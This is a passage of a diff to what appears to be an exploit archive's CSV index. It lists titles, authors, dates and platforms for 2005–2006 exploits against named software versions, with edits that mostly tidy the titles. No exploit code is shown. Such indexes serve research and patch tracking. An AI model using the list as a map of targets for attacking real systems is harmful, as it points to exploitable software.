928,platforms/php/webapps/928.py,"PunBB 1.2.4 (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0 -929,platforms/windows/local/929.py,"Microsoft Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-12,"Tal Zeltzer",windows,local,0 +929,platforms/windows/local/929.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer DHTML Object Memory Corruption Exploit",2005-04-12,Skylined,windows,remote,0 931,platforms/windows/dos/931.html,"Microsoft Internet Explorer DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 932,platforms/windows/local/932.sql,"Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit",2005-04-13,"Esteban Fayo",windows,local,0 @@ -770,23 +770,23 @@ id,file,description,date,author,platform,type,port 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit",2005-04-20,houseofdabus,multiple,dos,0 949,platforms/windows/remote/949.c,"PMsoftware Simple Web Server 1.0 - Remote Stack Overflow Exploit",2005-04-20,c0d3r,windows,remote,80 950,platforms/linux/local/950.c,"BitchX <= 1.0c20 - Local Buffer Overflow Exploit",2005-04-21,sk,linux,local,0 -951,platforms/windows/local/951.py,"Microsoft Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-22,"Jean Luc",windows,local,0 +951,platforms/windows/local/951.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (2)",2005-04-22,"Jean Luc",windows,local,0 952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional https Remote BoF Exploit",2005-04-25,CorryL,windows,remote,8080 953,platforms/windows/remote/953.c,"Yager <= 5.24 - Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089 954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0 955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21 956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0 -957,platforms/linux/dos/957.c,"Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 -958,platforms/linux/dos/958.c,"Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 +957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 +958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 (isis_print) Infinite Loop DoS Exploit",2005-04-26,vade79,linux,dos,0 960,platforms/windows/remote/960.c,"MySQL MaxDB Webtool <= 7.5.00.23 - Remote Stack Overflow Exploit",2005-04-27,cybertronic,windows,remote,9999 963,platforms/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure Exploit",2005-04-28,Kozan,windows,local,0 964,platforms/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 965,platforms/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 966,platforms/windows/local/966.c,"NotJustBrowsing 1.0.3 - Local Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 -967,platforms/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit",2005-04-29,ATmaCA,windows,remote,21 -968,platforms/windows/remote/968.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (2nd)",2005-04-29,c0d3r,windows,remote,21 -969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (3rd)",2005-04-29,darkeagle,windows,remote,21 +967,platforms/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (1)",2005-04-29,ATmaCA,windows,remote,21 +968,platforms/windows/remote/968.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (2)",2005-04-29,c0d3r,windows,remote,21 +969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (3)",2005-04-29,darkeagle,windows,remote,21 970,platforms/linux/remote/970.c,"Snmppd SNMP Proxy Daemon Remote Format String Exploit",2005-04-29,cybertronic,linux,remote,164 971,platforms/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation Exploit",2005-04-29,"Jerome Athias",windows,local,0 972,platforms/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Local Root Format String Exploit",2005-04-30,"Kevin Finisterre",solaris,local,0 @@ -819,7 +819,7 @@ id,file,description,date,author,platform,type,port 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board <= 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service Exploit",2005-05-21,"Daniel Hartmeier",multiple,dos,0 -1009,platforms/linux/local/1009.c,"Exim <= 4.41 dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 +1009,platforms/linux/local/1009.c,"Exim <= 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php)",2005-05-26,mh_p0rtal,asp,webapps,0 1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html)",2005-05-26,"Soroush Dalili",asp,webapps,0 @@ -845,7 +845,7 @@ id,file,description,date,author,platform,type,port 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation Vulnerability",2005-06-07,"Ilya Rabinovich",windows,local,0 1033,platforms/php/webapps/1033.pl,"WordPress <= 1.5.1.1 - SQL Injection Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 1034,platforms/windows/local/1034.cpp,"WinZIP <= 8.1 Command Line Local Buffer Overflow Exploit",2005-06-07,ATmaCA,windows,local,0 -1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 +1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 1036,platforms/php/webapps/1036.php,"Invision Power Board <= 1.3.1 - Login.php SQL Injection",2005-06-08,N/A,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143 @@ -929,7 +929,7 @@ id,file,description,date,author,platform,type,port 1120,platforms/cgi/webapps/1120.pl,"FtpLocate <= 2.02 (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 1121,platforms/windows/dos/1121.pl,"FTPshell Server <= 3.38 - Remote Denial of Service Exploit",2005-07-26,"Reed Arvin",windows,dos,0 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 -1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 +1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 @@ -952,7 +952,7 @@ id,file,description,date,author,platform,type,port 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,N/A,windows,remote,1761 -1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,N/A,windows,remote,143 +1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,N/A,windows,remote,143 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 iMonitor Remote Stack Overflow",2005-08-12,N/A,windows,remote,8008 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit",2005-08-12,"Pierre Kroma",hardware,dos,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0 @@ -982,7 +982,7 @@ id,file,description,date,author,platform,type,port 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 - UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 - (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0 -1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-08-30,basher13,windows,remote,80 +1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (2)",2005-08-30,basher13,windows,remote,80 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 - Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 - (-lib) Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 1187,platforms/linux/local/1187.c,"Gopher <= 3.0.9 (+VIEWS) Remote (Client Side) Buffer Overflow Exploit",2005-08-30,vade79,linux,local,0 @@ -1003,7 +1003,7 @@ id,file,description,date,author,platform,type,port 1204,platforms/multiple/dos/1204.html,"Mozilla Products (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1207,platforms/php/webapps/1207.php,"Class-1 Forum <= 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily <= 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0 -1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 +1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 USER Buffer Overflow Exploit",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool <= 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 @@ -1026,7 +1026,7 @@ id,file,description,date,author,platform,type,port 1231,platforms/linux/remote/1231.pl,"WzdFTPD <= 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player Remote Format String Exploit (linux)",2005-09-26,c0ntex,linux,remote,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox <= 1.0.7 - Integer Overflow Denial of Service Exploit",2005-09-26,"Georgi Guninski",multiple,dos,0 -1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit (fbsd)",2005-09-26,"Angelo Rosiello",bsd,remote,143 +1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit (fbsd)",2005-09-26,"Angelo Rosiello",bsd,remote,143 1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 Command Execution Exploit (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 (msg_send) SQL Injection Exploit",2005-09-28,rgod,php,webapps,0 @@ -1063,7 +1063,7 @@ id,file,description,date,author,platform,type,port 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,N/A,windows,dos,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 -1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 +1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 - Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit",2005-10-28,"Tom Ferris",windows,dos,0 @@ -1082,7 +1082,7 @@ id,file,description,date,author,platform,type,port 1289,platforms/php/webapps/1289.php,"CuteNews <= 1.4.1 (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 1290,platforms/linux/remote/1290.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 1291,platforms/linux/remote/1291.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 -1292,platforms/multiple/remote/1292.pm,"WzdFTPD <= 0.5.4 (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 +1292,platforms/multiple/remote/1292.pm,"WzdFTPD <= 0.5.4 - (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit",2005-11-06,B~HFH,php,webapps,0 1297,platforms/linux/local/1297.py,"F-Secure Internet Gatekeeper for Linux < 2.15.484 - Local Root Exploit",2005-11-07,"Xavier de Leon",linux,local,0 @@ -1092,7 +1092,7 @@ id,file,description,date,author,platform,type,port 1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0 1312,platforms/php/webapps/1312.php,"Moodle <= 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 -1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 +1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 1314,platforms/linux/remote/1314.rb,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 VCSI18N_LANG Local Overflow Exploit",2005-11-12,"Kevin Finisterre",linux,local,0 @@ -1169,8 +1169,8 @@ id,file,description,date,author,platform,type,port 1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart <= 3.0 - Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 1402,platforms/sco/local/1402.c,"SCO Openserver 5.0.7 - (termsh) Local Privilege Escalation Exploit",2006-01-03,prdelka,sco,local,0 -1403,platforms/windows/local/1403.c,"WinRAR 3.30 Long Filename Buffer Overflow Exploit",2006-01-04,K4P0,windows,local,0 -1404,platforms/windows/local/1404.c,"WinRAR 3.30 Long Filename Buffer Overflow Exploit (more targets) (2)",2006-01-04,c0d3r,windows,local,0 +1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow Exploit (1)",2006-01-04,K4P0,windows,local,0 +1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow Exploit (2)",2006-01-04,c0d3r,windows,local,0 1405,platforms/php/webapps/1405.pl,"FlatCMS <= 1.01 (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 1406,platforms/windows/local/1406.php,"PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit",2006-01-05,mercenary,windows,local,0 1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 @@ -1219,11 +1219,11 @@ id,file,description,date,author,platform,type,port 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit",2006-02-06,"Pierre Betouin",hardware,dos,0 -1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux)",2006-02-07,"H D Moore",linux,remote,0 +1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 location.QueryInterface() Code Execution (Linux)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service Vulnerability",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 -1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0 +1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX)",2006-02-08,"H D Moore",osx,remote,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 @@ -1242,7 +1242,7 @@ id,file,description,date,author,platform,type,port 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point (Fragmented UDP) DoS Exploit",2006-02-14,"Aaron Portnoy",hardware,dos,0 1498,platforms/php/webapps/1498.php,"webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) <= 1.03 - Multiple SQL Injection Exploit",2006-02-15,"HACKERS PAL",php,webapps,0 -1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005)",2006-02-15,ATmaCA,windows,dos,0 +1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 1503,platforms/php/webapps/1503.pl,"YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 @@ -1331,7 +1331,7 @@ id,file,description,date,author,platform,type,port 1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog <= 6.0 (fldGalleryID) Remote SQL Injection Exploit",2006-03-18,nukedx,asp,webapps,0 1590,platforms/php/webapps/1590.pl,"ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit",2006-03-18,DarkFig,php,webapps,0 1591,platforms/linux/local/1591.py,"Python <= 2.4.2 realpath() Local Stack Overflow Exploit",2006-03-18,"Gotfault Security",linux,local,0 -1592,platforms/windows/remote/1592.c,"Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit",2006-03-19,pLL,windows,remote,0 +1592,platforms/windows/remote/1592.c,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow Exploit",2006-03-19,pLL,windows,remote,0 1593,platforms/windows/dos/1593.c,"Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit",2006-03-19,Omni,windows,dos,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards <= 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 @@ -1345,7 +1345,7 @@ id,file,description,date,author,platform,type,port 1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6.0 (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 -1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 +1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0 1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 @@ -1359,7 +1359,7 @@ id,file,description,date,author,platform,type,port 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - (sendpassword.php) SQL Injection Exploit",2006-03-28,rgod,php,webapps,0 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)",2006-03-28,Hessam-x,php,webapps,0 -1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer (createTextRang) Remote Exploit (meta update)",2006-04-01,"Randy Flood",windows,remote,0 +1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (meta update)",2006-04-01,"Randy Flood",windows,remote,0 1621,platforms/php/webapps/1621.php,"Plogger <= Beta 2.1 Administrative Credentials Disclosure Exploit",2006-03-28,rgod,php,webapps,0 1622,platforms/multiple/dos/1622.pl,"RealPlayer <= 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0 1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 @@ -1367,7 +1367,7 @@ id,file,description,date,author,platform,type,port 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (Win32) (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 -1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 +1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - (vwar_root2) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1631,platforms/php/webapps/1631.php,"ReloadCMS <= 1.2.5 - Cross-Site Scripting / Remote Code Execution Exploit",2006-04-02,rgod,php,webapps,0 @@ -1498,7 +1498,7 @@ id,file,description,date,author,platform,type,port 1783,platforms/windows/dos/1783.txt,"Genecys <= 0.2 - (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1784,platforms/windows/dos/1784.txt,"raydium <= svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 -1787,platforms/windows/remote/1787.py,"freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 +1787,platforms/windows/remote/1787.py,"freeSSHd <= 1.0.9 - Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (Metasploit)",2006-05-15,y0,windows,remote,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0 @@ -1532,7 +1532,7 @@ id,file,description,date,author,platform,type,port 1819,platforms/multiple/dos/1819.txt,"PunkBuster < 1.229 - (WebTool Service) Remote Buffer Overflow DoS",2006-05-23,"Luigi Auriemma",multiple,dos,0 1820,platforms/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - (frameNum) Server Terminiation Exploit",2006-05-23,"Luigi Auriemma",multiple,dos,0 1821,platforms/php/webapps/1821.php,"Drupal <= 4.7 (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 -1823,platforms/php/webapps/1823.txt,"BASE <= 1.2.4 